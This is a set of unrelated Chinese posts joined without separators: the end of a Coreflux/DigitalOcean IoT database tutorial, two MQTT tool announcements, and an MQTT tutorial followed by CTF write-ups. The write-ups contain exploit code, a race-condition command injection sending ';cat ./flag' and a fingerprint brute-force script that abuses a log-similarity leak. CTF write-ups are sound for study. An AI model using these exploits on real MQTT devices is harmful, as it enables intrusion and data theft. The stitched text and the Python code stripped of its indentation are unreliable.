    "$oid": "68626dc3e8385cbe9a1666c3"
  },
  "energy": 36,
  "energy_wh": 36000,
  "production_status": "active",
  "production_count": 31,
  "stoppage": 0,
  "maintenance_alert": false,
  "timestamp": "2025-06-30 10:58:11",
  "device_name": "station2"
}

正如我们之前看到的,所有数据都可在MQTT代理中用于其他用途和集成。

验证MySQL存储

使用DBeaver连接到你的MySQL托管数据库以验证可扩展存储:

  1. 使用来自你的DigitalOcean数据库的连接字符串
  2. 导航到coreflux-broker-data数据库(或你为数据库指定的名称)
  3. 检查MachineProductionData表中存储的记录

验证MySQL中存储的物联网记录

与其他集成一样,所有数据也可在MQTT代理中用于其他用途和下游集成。

监控实时数据流

验证OpenSearch存储

使用提供的URL和凭据打开OpenSearchDashboards

  1. 打开菜单并选择索引管理选项

    1. 在菜单中选择索引选项,查看你的表名是否出现在列表中

检查数据库存储

  1. 返回主页并在菜单中选择发现选项

    1. 按照提供的步骤创建索引模式
    2. 返回到发现页面,你应该会看到你的数据

检查数据库存储

正如我们之前看到的,所有数据都可在MQTT代理中用于其他用途和集成。

检查数据库存储

步骤10 - 扩展你的用例和集成

测试LoT能力

  • 发布示例数据:使用MQTT Explorer将示例数据集发布到你的Coreflux代理。尝试不同的负载结构和不同的模型/操作,查看它们如何处理并存储到你选择的数据库中。
  • 数据验证:验证你数据库中的数据与你发布的有效负载是否匹配。使用你的数据库客户端(PostgreSQL使用DBeaver,MongoDB使用MongoDB Compass,OpenSearch使用OpenSearch Dashboards)检查一致性和准确性,确保你的物联网自动化集成按预期工作。比较时间戳、字段转换和数据类型,以验证你的实时数据管道。
  • 实时监控:使用另一个MQTT数据源(例如具有MQTT连接功能的简单传感器)设置连续的实时数据馈送。观察Coreflux和你的数据库如何处理传入的物联网数据流,并探索数据检索和查询的响应时间。

构建分析和可视化

  • 创建仪表板:与Grafana等可视化工具集成,创建显示你的物联网数据的仪表板,从实时MQTT主题和历史数据库查询中提取数据。跟踪指标,如设备正常运行时间、传感器读数、生产计数或来自你自动化系统的维护警报。了解如何使用我们的教程设置DigitalOcean托管数据库与Prometheus和Grafana的监控。对于实时仪表板,直接订阅MQTT主题;对于历史趋势和聚合,查询你的数据库。
  • 趋势分析:利用你数据库的能力来分析随时间变化的趋势:

    • PostgreSQL:使用SQL查询进行复杂的关系分析
    • MongoDB:使用聚合框架进行基于文档的分析
    • OpenSearch:使用高级分析和搜索能力进行全文搜索和时间序列分析
  • 多数据库集成:探索集成其他托管数据库,如用于非结构化数据的MongoDB,用于关系数据的PostgreSQL,用于结构化查询的MySQL,或用于高级分析和搜索的OpenSearch。使用Coreflux路由将数据同时发送到多个目的地。

优化和扩展你的物联网基础设施

  • 负载测试:使用LoT Notebook或自动化脚本通过同时发布多条消息来模拟高流量。监控你的Coreflux MQTT代理和数据库集群如何处理负载,并识别你的数据管道中的任何瓶颈。
  • 扩展DigitalOcean提供垂直和水平扩展选项。随着你的物联网数据需求增长,增加droplet资源(CPU、RAM或存储)。扩展你的托管数据库集群以处理更大的数据集,并配置自动扩展警报,以便在接近资源限制时通知你。

常见问题解答

1. 如何将Coreflux MQTT代理与托管数据库集成?

你通过定义指向目标服务(PostgreSQL、MySQL、MongoDB或OpenSearch)的LoTRoute来将Coreflux MQTT代理与托管数据库集成。每个路由使用适当的连接参数(服务器或连接字符串、端口、数据库名称、用户名、密码和SSL/TLS选项),并自动将MQTT消息有效负载持久化到表、集合或索引中。一旦定义好路由,你就使用STORE IN指令将其附加到Model,这样每个处理后的消息都会被写入你选择的数据库。

2. 我能否在不编写自定义集成代码的情况下将MQTT数据直接保存到数据库?

可以。Coreflux设计为一个低代码集成层,因此你无需编写应用程序代码或外部ETL作业来持久化数据。对于每种数据库类型,你配置一个LoT路由(例如,PostgreSQL_LogMySQL_Logmongo_routeOpenSearch_Log),然后使用STORE IN "<route_name>" WITH TABLE "MachineProductionData"扩展你的模型。Coreflux处理连接池、重试和错误处理,因此你可以专注于建模主题和转换,而不是样板数据库代码。

3. 我应该为MQTT物联网数据存储选择哪种托管数据库?

你的MQTT物联网数据的最佳托管数据库取决于你的数据结构、查询需求和分析目标。使用下面的比较表来帮助你决定:

数据库最适合示例用例
PostgreSQL强一致性、关系模式、复杂的SQL查询工业传感器网络、事务性事件、需要跨连接数据集的分析
MySQL关系数据、结构化查询、广泛的兼容性库存系统、生产指标、传统业务记录
MongoDB灵活、不断演进的模式;文档存储具有可变负载的互联设备、具有变化格式的物联网遥测
OpenSearch全文搜索、分析、仪表板、日志索引时间序列分析、监控、事件日志、物联网搜索和可视化

提示: 你可以通过配置多个Coreflux路由同时使用多个托管数据库。这使得可以从同一个MQTT流中,将结构化的物联网数据存储在PostgreSQL或MySQL中,在OpenSearch中聚合日志和指标,并在MongoDB中收集非结构化或无模式数据。

4. 这种架构如何处理实时和历史分析?

Coreflux将所有处理后的值保留在MQTT主题上,供实时消费、仪表板或额外管道使用,而Routes则将相同的建模数据持久化到你的数据库中,用于历史查询。在实践中,你可以订阅主题以进行即时反应(警报、控制回路),并查询PostgreSQL/MySQL/MongoDB/OpenSearch以进行聚合、趋势和长期分析。这种双路径设计反映了MQTT和物联网数据集成教程中的常见模式,其中代理提供实时消息传递,而数据库提供持久存储和分析。

5. Coreflux和托管数据库之间的连接有多安全?

当部署在DigitalOcean上时,你可以使用VPC网络来保持Coreflux MQTT代理和数据库之间的所有通信私密。VPC将你的资源与公共互联网访问隔离开来,并且DigitalOcean托管数据库支持连接的TLS加密。此外,你可以为你的Coreflux应用程序创建具有有限权限的专用数据库用户,遵循最小权限原则。

6. 这个设置是否适用于生产环境物联网部署?

是的。这种架构反映了生产环境中MQTT和数据库集成所使用的模式,其中代理前端处理设备流量,而托管数据库层提供持久性和分析。DigitalOcean托管数据库提供自动备份、高可用性和监控,而Coreflux MQTT代理可以水平扩展以处理高消息吞吐量。对于生产环境,你还应该配置防火墙规则、使用强凭据、为MQTT和数据库连接启用TLS,并根据预期的消息量来调整你的droplet和集群大小。

7. 我能否在没有公共互联网访问的情况下,或在混合环境中运行MQTT代理?

可以。MQTT代理通常部署在私有网络或边缘环境中,公共资源一致指出,只要客户端可以访问代理,MQTT就可以在没有公共互联网的情况下工作。使用DigitalOcean,你可以将Coreflux和你的数据库保持在VPC内部,并且只暴露绝对必要的内容(例如,VPN、堡垒主机或有限的防火墙规则)。如果你需要混合或多站点架构,你还可以将选定的主题与其他代理或云区域同步。

8. 在物联网数据中使用MQTT和数据库是否存在任何限制或权衡?

MQTT针对轻量级、事件驱动的消息传递进行了优化;数据库则针对存储和查询进行了优化。存储每一条原始消息可能会变得昂贵或嘈杂,因此最佳实践建议仔细建模数据(例如,聚合指标、过滤主题或降采样)。极低功耗设备或超受限网络可能难以维持持久连接或处理TLS开销,在这种情况下,你可能需要调整QoS级别、批处理和保留策略。只要你在设计中考虑到这些权衡,MQTT加上托管数据库对于大多数物联网场景都能很好地工作。

9. 我如何为我的物联网项目在PostgreSQL、MySQL、MongoDB和OpenSearch之间做出选择?

你应该根据物联网数据结构、可扩展性以及你希望如何查询设备数据来选择托管数据库。下表总结了每个选项的优势:

数据库当...时最佳典型用例关键优势
PostgreSQL你需要复杂的关系查询、强一致性和事务完整性(ACID支持)。工业传感器网络、将设备数据与生产相关联、需要对连接的数据集进行分析关系模式、高级SQL、一致性
MySQL你的工作负载是结构化的,具有广泛的工具和兼容性需求。库存跟踪、传统业务系统、生产指标更简单的关系需求、广泛支持
MongoDB你的设备负载和模式不断演变,或者你希望使用灵活的、基于文档的存储进行快速原型设计。具有可变格式的物联网遥测、快速开发、半结构化数据灵活的模式、易于扩展、快速原型设计
OpenSearch你需要分析、搜索或对大容量的物联网数据(日志、时间序列、事件)进行仪表板展示。搜索传感器数据、日志分析、可视化、基于关键字/时间的查询搜索、全文、分析、快速聚合

结论

将Coreflux MQTT代理与DigitalOcean的托管数据库服务(PostgreSQL、MongoDB、MySQL或OpenSearch)集成,为你提供了实时物联网数据处理和存储的完整设置。按照本教程,你已经使用低代码开发实践构建了一个收集、处理和存储物联网数据的自动化管道。

借助Coreflux的架构和你选择的数据库的存储特性,你可以处理大量的实时数据并查询它以获取洞察。无论你是监控工业系统、跟踪环境传感器还是管理智慧城市基础设施,这种设置都让你能够基于实时MQTT主题和历史数据库查询做出数据驱动的决策。

了解更多关于DigitalOcean托管数据库的信息,以及DigitalOcean 针对 IoT行业的产品服务支持,可咨询 DigitalOcean 中国区独家战略合作伙伴卓普云AI Droplet(aidroplet.com)

你可以尝试提供的用例或使用Coreflux和DigitalOcean实现你自己的用例。你还可以在DigitalOcean Droplet市场或通过Coreflux网站获取免费的Coreflux MQTT代理

我一直用 Bark ,很喜欢:省心、稳定,作者也一直在更新。PushGo 这个坑某种程度上就是从 Bark 开始的,先向作者致敬🫡。

后来我自己维护的东西越来越多:服务器、CI 、脚本任务、家里设备……推送一开始还能靠“多发点提醒”解决,但很快就会变成另一种麻烦:消息很难整理。同一件事会从不同来源冒出来(监控、脚本、日志、告警),通知列表里一堆“碎片”,你要自己在脑子里拼图:到底发生了什么、现在处于什么状态、是偶发还是持续、有没有恢复。

所以我干脆自己写了个 PushGo ,目前它的定位很明确:先把“收消息 + 更好整理”做好。后面再慢慢往更通用、更可扩展的方向演进。

PushGo 的思路

PushGo 的思路和 Bark 不太一样,更像 MQTT / Ntfy 那套:频道 + 订阅( pub/sub )

你创建频道、订阅频道,消息按主题走,路由和转发会灵活很多;未来不管是扩展更多推送渠道,还是把消息类型做得更丰富,这种结构都更顺手。

  • 目前已经完成 iOS / watchOS / macOS + Android ( FCM )平台适配,全部原生开发,apple 平台使用 Swift ,Android 平台使用 Kotlin
  • WNS 和自有推送渠道正在路上,国内无法访问 FCM 的问题,自有渠道上线后就会得到解决
  • 公共网关已部署,并且支持自部署网关
  • 消息正文支持文本和部分 markdown 标签,可以渲染轻量级表格
  • 消息支持 AES-GCM 加密,网关不保留任何与解密有关的数据
  • 永久完全免费,不管客户端还是网关,纯公益运营

未来方向

  • 客户端会持续推进更多平台支持,并不仅限于高性能设备,比如目前我自己就在做一个带屏的 ESP32 设备

  • 目前客户端还很简单,也存在很多不足,尤其是 UI ,因为我自己实在没有这方面的天赋,所以 UI 只能尽量贴合系统原生,未来会持续改进优化,不断改进功能和体验,如果你有任何产品问题和建议,也可以加入 TG 群一起探讨,如果有小伙伴愿意提供 ui 设计方面的支持,欢迎 TG 私聊,感谢

  • 服务端未来会加入 MQTT 等协议支持,不仅支持消息接入,也会提供第三方注册为客户端接收消息

  • 我后面有一个比较明确的长期方向:参考 IoT 里的 物模型 概念,把一些东西(服务器、任务、设备)抽象成“模型”,用属性持续更新状态,然后在 App 端围绕这些状态做聚合展示、规则处理、报警/联动等。从消息接收器转身为综合消息枢纽,不过这个变化很大,未来尚不确定是基于 PushGo 演进,或者另开新坑

目前进度 & 参与测试

目前网关 + iOS / watchOS / macOS + Android ( FCM )都已经有初版了,也部署了公共网关,正式版预计将在一个月左右到来。

作为免费运营的公益项目,欢迎大家参与共建,为 App 和网关的持续迭代建言献策,我不希望闭门造车,大家的需求才是最重要的演进方向

截图

截图被第三方图床压缩过了,惨不忍睹,大家随便看看就好

github 地址:

dreamlonglll/mini-mqtt-client: 一个开源的 mqtt 客户端工具。支持保存命令、定时循环发送和预处理脚本

开发原因

  1. mqttx 不好用,没有指令存储功能
  2. 佬友的另一个 mqtt 项目 【https://linux.do/t/topic/1365043】 采用的 Electron 架构,有点大。

开发目的

主要目的: 自用
次要目的: 为开源事业做一次贡献

项目优势

  • 采用 tarui 架构,整包大小控制在 6M(win/linux 端)左右
  • github action 打包编译 win+mac+linux 多端应用
  • 支持 tls + 自签 CA + 客户端证书 + 证书密钥
  • 支持指令存储以及循环发送(按 server 分割)
  • 支持预处理脚本(按 server 分割)
    • 采用 JavaScript 脚本引擎 + 沙箱模式
    • 支持:发送前预处理、接收后处理
    • 内置加密工具库(AES、SHA、MD5、HMAC 等)
  • 支持切换数据存储位置,可以搭配 OneDrive 实现云端同步
多图


开源感言

首先感谢佬友的使用,也十分感谢提出建议的佬友,并期待佬友提出更多的建议

其他

目前时间挺空的,会及时更新


📌 转载信息
原作者:
wang.wai
转载时间:
2026/1/16 12:25:02

MQTT讲解

MQTT(Message Queuing Telemetry Transport,消息队列遥测传输协议),是一种基于发布/订阅(publish/subscribe)模式的“轻量级”通讯协议,该协议构建于TCP/IP协议上,由IBM在1999年发布。

MQTT最大优点在于,用极少的代码和有限的带宽,为连接远程设备提供实时可靠的消息服务。

作为一种低开销、低带宽占用的即时通讯协议,使其在物联网、小型设备、移动应用等方面有较广泛的应用。

协议原理

实现MQTT协议需要客户端和服务器端通讯完成,在通讯过程中,MQTT协议中有三种身份:发布者(Publish)、代理(Broker)(服务器)、订阅者(Subscribe)。其中,消息的发布者和订阅者都是客户端,消息代理是服务器,消息发布者可以同时是订阅者。

MQTT传输的消息分为:主题(Topic)和负载(payload)两部分:

(1)Topic,可以理解为消息的类型,订阅者订阅(Subscribe)后,就会收到该主题的消息内容(payload);
(2)payload,可以理解为消息的内容,是指订阅者具体要使用的内容。

发布者 (Publisher)

功能: 负责产生数据和消息,并将这些指定topic的消息发送(发布/Publish)到 Broker。

代理/服务器(broker)

可以理解为提供 mqtt 服务的代理服务器 ,通俗一点来讲就是”邮局”或者说是”消息中转中心”,每个 client 之间的通信都必须通过 Broker 来进行。
简单来说,Broker就是一个中间人,负责管理所有客户端的连接,并确保消息能够从一个客户端安全、高效地传递到另一个或多个客户端。

订阅者(Subscribe)

功能: 负责接收它感兴趣的消息。它会提前告诉Broker它对哪个”主题”(Topic)的消息感兴趣(这个行为叫做订阅/Subscribe),就会接收订阅相同topic的client。

客户端Client

客户端可以充当发布者,也可以充当订阅者,也可以同时充当两个角色

Client 是指任何连接到 Broker 的设备或应用程序 ,可以理解为”寄信人”和”收信人”。在物联网场景中,一个 Client 可以是一个温度传感器、一个智能灯泡、一部手机上的App,或者是一个在服务器上运行的数据分析程序。

示意图

client1,2,3,4同时连接broker,client1,2,3订阅topic"diag" ,这时client4发送topic为"diag" msg="hello"给broker,broker会向同时订阅topic="diag"的client1,2,3发送这个消息

image.png

环境配置

1.使用安装 Mosquitto MQTT

sudo apt update
sudo apt install mosquitto mosquitto-clients

2.启动服务并设置开机自启

sudo systemctl enable mosquitto
sudo systemctl start mosquitto

3.配置conf

sudo vim /etc/mosquitto/mosquitto.conf

在文件中添加

listener 1883 #设置监听端口为 1883
allow_anonymous true  # 可选,允许匿名访问(默认)

摁“Esc”+“:wq”退出后终端输入

sudo systemctl restart mosquitto # 重启服务

image.png

netstat -lnvp查看一下,可以看到1883端口已经开始监听

image.png

下载mqttx

MQTTX Download

image.png

点击新建连接,我这里是wsl启动的,但是监听了所有ip的端口,所以ip直接填0.0.0.0

image.png

添加一个订阅

image.png

利用终端进行连接测试

终端输入

mosquitto_pub -h localhost -t testtopic -m "Hello MQTT"

可以看到在客户端已经收到了消息

image.png

终端输入

mosquitto_sub -h localhost -t testtopic

用来订阅这个消息,在客户端输入主题testtopic

image.png
发送之后,在客户端和终端界面均可以看到刚才发的消息

image.png

python使用mqtt

pip install paho-mqtt

发送端

# -*- coding: utf-8 -*-# -*- coding: utf-8 -*-

import paho.mqtt.client as mqtt
import time

def on_connect(client, userdata, flags, rc):
print("链接")
print("Connected with result code: " + str(rc))

def on_message(client, userdata, msg):
print("消息内容")
print(msg.topic + " " + str(msg.payload))

#   订阅回调
def on_subscribe(client, userdata, mid, granted_qos):
print("订阅")
print("On Subscribed: qos = %d" % granted_qos)
pass

#   取消订阅回调
def on_unsubscribe(client, userdata, mid, granted_qos):
print("取消订阅")
print("On unSubscribed: qos = %d" % granted_qos)
pass

#   发布消息回调
def on_publish(client, userdata, mid):
print("发布消息")
print("On onPublish: qos = %d" % mid)
pass

#   断开链接回调
def on_disconnect(client, userdata, rc):
print("断开链接")
print("Unexpected disconnection rc = " + str(rc))
pass

client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.on_disconnect = on_disconnect
client.on_unsubscribe = on_unsubscribe
client.on_subscribe = on_subscribe
client.connect('127.0.0.1', 1883, 600)  # 600为keepalive的时间间隔
while True:
client.publish(topic='testtopic', payload='amazing', qos=0, retain=False)
time.sleep(2)

image.png

image.png

接收端

# -*- coding: utf-8 -*-# -*- coding: utf-8 -*-

import paho.mqtt.client as mqtt
import time

def on_connect(client, userdata, flags, rc):
print("链接")
print("Connected with result code: " + str(rc))

def on_message(client, userdata, msg):
print("消息内容")
print(msg.topic + " " + str(msg.payload))

#   订阅回调
def on_subscribe(client, userdata, mid, granted_qos):
print("订阅")
print("On Subscribed: qos = %d" % granted_qos)
pass

#   取消订阅回调
def on_unsubscribe(client, userdata, mid, granted_qos):
print("取消订阅")
print("On unSubscribed: qos = %d" % granted_qos)
pass

#   发布消息回调
def on_publish(client, userdata, mid):
print("发布消息")
print("On onPublish: id = %d" % mid)
pass

#   断开链接回调
def on_disconnect(client, userdata, rc):
print("断开链接")
print("Unexpected disconnection rc = " + str(rc))
pass

client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.on_disconnect = on_disconnect
client.on_unsubscribe = on_unsubscribe
client.on_subscribe = on_subscribe
client.connect('127.0.0.1', 1883, 600)  # 600为keepalive的时间间隔

client.subscribe('testtopic', qos=0)

client.loop_forever() # 保持连接

image.png

image.png

例题讲解

CISCN2025——final mqtt

题目分析

image.png

image.png

程序首先会读取两个文件,如果文件不存在则直接退出

所以首先需要创建两个文件

image.png

接着会创建一个mqtt客户端,但是这里要求broker的监听端口是9999,所以我们需要改一下端口,修改方式上文说过

image.png
成功启动服务

image.png

首先程序会在订阅的diag主题中接受auth,cmd,arg三个参数,而且arg参数存放在bss段上

image.png

在start_routine函数中,会首先进行一个认证

image.png

认证的逻辑就是将接收到的VIN码转成十六进制(其实就是在考察mqtt接受数据),不多赘述了

随后根据cmd值,可以调用set_vin命令

image.png

这里有一个很明显的命令注入,src就是我们刚才的arg参数

popen函数会执行s的命令,由于是“r”参数,所以他会将命令执行的结果传入管道,在fread的时候读到ptr+5的位置,然后利用mqttsend函数发送给broker

image.png

但是执行命令之前,会有一个check函数,这个函数不细看了,功能就是只允许命令中有数字或字母出现,这就导致命令注入无法输入符号而不成功

但是由于检查完之后到执行命令之前,子进程会执行一个sleep(2)的函数,于是在这个期间我们就可以再次发送消息,修改arg为命令注入的参数,这当然绕不过check的检查,但是在上一个子进程休眠两秒结束后,我们的命令已经被修改了,于是就可以执行命令注入了

exp

#! /usr/bin/python3
import random
from pwn import *
import time
import paho.mqtt.client as mqtt
import json
context(log_level = "debug",os = "linux",arch = "amd64")
pwnFile = "./pwn"
libcFile = "./libc.so.6"
ip = "127.0.0.1"
local = ""
local_port = 9999
port = 9999
elf = ELF(pwnFile)
libc = ELF(libcFile)

def publish(client,topic,auth,cmd,arg):
msg = {
"auth":auth,
"cmd":cmd,
"arg":arg
}
result = client.publish(topic = topic, payload = json.dumps(msg))
print(json.dumps(msg))
print(result)
return result

def on_connect(client, userdata, flags, rc):
client.subscribe("vehicle_diag")
client.subscribe("diag")
client.subscribe("#")  # 订阅所有
client.subscribe("diag/resp")
print("Connected with result code " + str(rc))

def on_subscribe(client,userdata,mid,granted_qos):
print("消息发送成功")

def on_message(client, userdata, msg):
message = msg.payload.decode()# Decode message payload
print(f"Received message on topic '{msg.topic}': {message}")
# try:
#     data = json.loads(message)  # 解析为字典
#     dest = data.get("vin")  # 获取vin字段
#     log.success("dest -> "+ dest)
# except json.JSONDecodeError:
#     print("JSON解析失败")
print(message)

def sum2hex(dest):
v3 = 0
for i in range(len(dest)):
v3 = (0x1f  * v3 +  ord(dest[i])) & 0xffffffff
log.success(f"sum2hex -> {v3:08x}")
return  f"{v3:08x}"

#gdb.attach(io,'b *$rebase(0x1EC0)')
topic = "diag"
client = mqtt.Client()

client.on_connect = on_connect
client.on_message = on_message
client.on_subscribe = on_subscribe
client.connect(host = "127.0.0.1",port = 9999,keepalive=10000)

auth = sum2hex("hahaha\n")#这里是你自己接收到的VIN码

publish(client,"diag",auth,"set_vin","111111111111")
sleep(0.5)
publish(client,"diag",auth,"set_vin",";cat ./flag")
publish(client,"diag",auth,"set_vin",";cat ./flag")
sleep(1)

client.loop_start()

打通截图

image.png

TPCTF——smart_door_lock

题目已开源TPCTF2025/pwn-smart-door-lock at main · tp-ctf/TPCTF2025 · GitHub

题目附件是抹了符号表的静态编译,总之如果让我来直接逆向这个程序,我能逆一年,所以仅从复现学习的角度,我们先来学习源码,在对应到IDA里逆向吧,不得不说抹了符号表确实给这个题增加了太多难度

本题exp学习自TPCTF 2025 Writeup by Nepnep

源码学习

main.cpp

image.png

main.cpp里核心就是调用了mqtt_lock这个函数,其他的都不重要,都是初始化和结束回收资源函数等等,我们不多关注了

door_lock.h

image.png

这里面首先定义了指纹结构体和门锁开关状态结构体,指纹结构体包含指纹信息,下一个指针(很明显是个链表),指纹的id和重试次数,门锁状态定义了开/关两种状态以及操作的时间戳。

image.png

其次定义了mqtt_lock函数(核心),以及其他一些mqtt回调函数,还有指纹链表(finger_list),以及本题的关键——logger这个文件,还有其他若干函数和参数,不多解释了,接下来的函数分析会提到

door_lock.cpp

image.png

这是一个处理json数据的辅助函数,在这个题中不涉及漏洞和核心逻辑,不多分析了

贴AI的解释

image.png

时间戳,不多说

image.png

大白话就是把输入的字符串形式的指纹数据提取成int数组

image.png

这里限制了指纹数据只能是数字,如果是其他的,比如字母,就会直接返回空指针,这里比较重要,后面要考,划重点

mqtt_lock::mqtt_lock(const char *id, const char *host, int port) : mosqpp::mosquittopp(id)
{
/* set connection */
int keepalive = 60;
tls_opts_set(1,"tlsv1",NULL);
tls_set("/etc/mosquitto/certs/ca.crt",NULL,NULL,NULL,NULL);
tls_insecure_set(true);
connect(host, port, keepalive);

/* inital session & token */
session_id = NULL;
auth_token = NULL;

/* set lock inital */
lock_door();
/* open logger create read write */
strcpy(log_file,"/etc/mosquitto/smart_lock.log");
logger = fopen(log_file, "w+");
if (logger == NULL) {
printf("Error opening file!\n");
exit(1);
}
int status = log("logger created:%s\n",log_file);

/* read fingers */
FILE* finger_file = fopen("/etc/mosquitto/fingers_credit","r");
if (finger_file == NULL) {
printf("Error opening file!\n");
exit(1);
}
char line[512];
fingers *finger_pos = NULL;
max_finger_id = 1;
while (fgets(line, sizeof(line), finger_file)) {
line[strcspn(line, "\n")] = 0;
struct fingers *new_finger = (struct fingers*)malloc(sizeof(struct fingers));
new_finger->finger_id = max_finger_id++;
new_finger->next = NULL;
new_finger->retry_count = 0;

if (new_finger == NULL) {
log("Error allocating memory!\n");
exit(1);
}
if (finger_list == NULL)
{
finger_list = new_finger;
finger_pos = new_finger;
} else {
finger_pos->next = new_finger;
finger_pos = new_finger;
}
if( edit_finger(new_finger,(char*)line)){
continue;
}
else {
free(new_finger);
continue;
}
}
fclose(finger_file);

/* inital subscribe*/
subscribe(NULL, "auth_token");
subscribe(NULL, "manager");
subscribe(NULL, "logger");
};

敲重点了!

image.png

首先初始化tls证书,session_id,auth_token,和mqtt的服务器(broker)进行连接

image.png

其次设置门锁状态为锁门,同时打开日志文件

这里初始化了logger(FILE类型),最终这个指针会存放在堆上,而本题的堆地址是固定值

为什么?

image.png

这是qemu虚拟机的结果

image.png

懂了吗?

image.png

这是我wsl的结果,所以这个系统ALSR随机化保护开的比较低,堆地址是固定的

image.png

接着从/etc/mosquitto/fingers_credit读出一个指纹数据(实则是长度为20的int数组),然后再程序中初始化一下指纹链表

image.png

image.png

最后订阅了这三个主题

image.png

mqtt_lock的析构函数

image.png

add函数,对应的堆题中的增函数,是一个比较经典的链表增添堆块类型,有个很明显的uaf,如果edit失败,new_finger这个指针会被free但是还在指针链表中

image.png

edit函数,format_finger为空指针,就会返回false,而这里根据前面对change_finger_format函数的分析,只要指纹数据里有字母,就会edit失败

由此可以利用uaf漏洞

image.png

remove操作,对应堆题中的删函数,操作没有什么漏洞

image.png

check_finger函数,这里会计算指纹的相似度,然后存放到日志中,后面有可以读取日志的操作,所以存在信息泄露,由此我们可以猜测出远端的指纹信息,具体exp如下

import paho.mqtt.client as mqtt
from time import sleep
import ssl
import re
import time
import random

# MQTT Broker Configuration
BROKER = "127.0.0.1"
PORT = 8883
CAFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/ca.crt"
CERTFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.crt"
KEYFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.key"
YELLOW = "\033[93m"
BLUE = "\033[94m"
END = "\033[0m"
auth_token_topic = "auth_token"
valid_token_topic = "validtoken123123"
logfile_topic = "logfile"
logger_topic = "logger"

fingerprint_array = [0] * 20  # 初始化数组,包含20个0

def extract_similarity_from_eof(log_messages):
"""从日志列表中提取 EOF 上一行的相似度百分比。"""
if len(log_messages) < 2:
return None
eof_index = len(log_messages) - 1
second_last_message = log_messages[eof_index - 1]
match = re.search(r"finger similarity:%([\d\.]+)", second_last_message)
return float(match.group(1)) if match else None

def on_message(client, userdata, msg):
"""回调函数,用于处理接收到的消息。"""
userdata.append(msg.payload.decode())

def perform_bruteforce():
results = []

# 设置订阅者以监听日志
print("[DEBUG] Setting up MQTT client for subscription...")
client = mqtt.Client(userdata=results)
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE, cert_reqs=ssl.CERT_NONE)
client.tls_insecure_set(True)
client.on_message = on_message

client.connect(BROKER, PORT, 60)
client.subscribe(logfile_topic)
client.loop_start()

# 验证 Token
print("[DEBUG] Publishing authentication token...")
client.publish(auth_token_topic, "validtoken123123")
time.sleep(2)
fingerprint_array = [0] * 20
random_array = [0] * 20
for i in range(20):
print(f"[DEBUG] Starting binary search for index {i}...")
left, right = 1, 2 ** 31 - 1  # 设置最大值为 2^31 - 1
while True:  # 修改为基于相似度的条件
random_array[i] = random.randint(left, right)  # 随机选择一个值
real_array = fingerprint_array.copy()
payload = f"[{','.join(map(str, random_array))}]"
print(f"[DEBUG] Publishing guess for index {i}: {payload}")
client.publish(valid_token_topic, payload)
time.sleep(0.5)

# 请求日志
print(f"[DEBUG] Requesting log data...")
client.publish(logger_topic, "download")
time.sleep(0.5)

# 等待相似度响应
if len(results) >= 2:  # 确保有足够的消息提取 EOF 上一行
similarity = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: {YELLOW}{random_array[i]}{END} : {BLUE}{similarity}{END}")

if similarity is None:
print("[DEBUG] No similarity data found, retrying...")
continue
P = similarity * 20 / 100
x1 = int(P * random_array[i])
x2 = int(random_array[i] // P)
# 两个分别发送一下看看比例
print(x1, x2)
real_array[i] = x1
client.publish(valid_token_topic, f"[{','.join(map(str, real_array))}]")
print(f"[DEBUG] Publishing guess for index {i}: {real_array}")
client.publish(logger_topic, "download")
sleep(1)
similarity1 = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: x1:{YELLOW}{x1}{END} : {BLUE}{similarity1}{END}")
real_array[i] = x2
client.publish(valid_token_topic, f"[{','.join(map(str, real_array))}]")
print(f"[DEBUG] Publishing guess for index {i}: {real_array}")
client.publish(logger_topic, "download")
sleep(1)
similarity2 = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: x2:{YELLOW}{x2}{END} : {BLUE}{similarity2}{END}")
if similarity1 > similarity2:
fingerprint_array[i] = x1
similarity = similarity1
else:
fingerprint_array[i] = x2
similarity = similarity2
random_array[i] = 0

if similarity >= 4.75 * (i + 1):
print(f"[DEBUG] Target similarity reached: {similarity} >= {4.75 * (i + 1)}")
break  # 达到目标相似度时结束循环

client.loop_stop()
client.disconnect()

print("Final fingerprint array:", fingerprint_array)
# fingerprint_array的逗号之间不要有空格
print("Final fingerprint array:", ','.join(map(str, fingerprint_array)), end="\n")

if __name__ == "__main__":
perform_bruteforce()

原理如下:

第一次我对第一位随机发送一个数,其余全是0,程序会计算出相似度,记为S,相似比为P(min(随机数Random,真实指纹数据Real)/max(随机数Random,真实指纹数据Real))则S=(P/20)*100,由于S可以泄露,则P=(S/100)*20,则一定有Real/Random=P或者Random/Real=P,即Real=P*Random或Real=Random/P

image.png

对应这段代码

然后我们把计算出来的两个可能真实值都发一遍,看看哪个相似度更高,哪个就是真实值

image.png

最后我们还要保证总相似度达到90%,保险起见,这里设置的阈值是95%=4.75%*20

image.png

日志写入函数,不多说了

image.png

download函数,其实就是堆题中的show函数,也就是这里可以泄露日志,clear函数,就是重新打开一遍日志文件,相当于把之前的清空了

image.png

开关门函数,其实就设置了一个状态,没什么用

void mqtt_lock::on_message(const struct mosquitto_message *message)
{

if(!strcmp(message->topic, "auth_token")){
if (auth_token) {
unsubscribe(NULL, auth_token);
// log("close subncribe:%s\n",auth_token);
free(auth_token);
}
auth_token = (char*)malloc(0x11);
char * payload = (char*)message->payload;
for (int i = 0; i<0x10;i++) {
if ((payload[i] <= '9' && payload[i] >= '0') || (payload[i] <= 'Z' && payload[i] >= 'A') || (payload[i] <= 'z' && payload[i] >= 'a')) {
auth_token[i] = payload[i];
} else {
log("auth_token error: token must be num or letter\n");
free(auth_token);
auth_token = NULL;
return;
}
}
auth_token[0x10] = 0;
log("auth_token:%s\n",auth_token);
char re_auth_token[20];
snprintf(re_auth_token, 20, "re_%s", auth_token);

subscribe(NULL, auth_token);

publish(NULL, re_auth_token, 11, "finger tap\n");
// log("open subncribe:%s\n",auth_token);

return;

}
else if(!strcmp(message->topic, "manager")) {
/*
{
"session": "a1b2c3d4e5",
"request": "add_finger",
"req_args": [
"john_doe",
"password123",
]
}*/
// add_finger edit_finger remove_finger lock_door unlock_door
char *payload = (char*)message->payload;
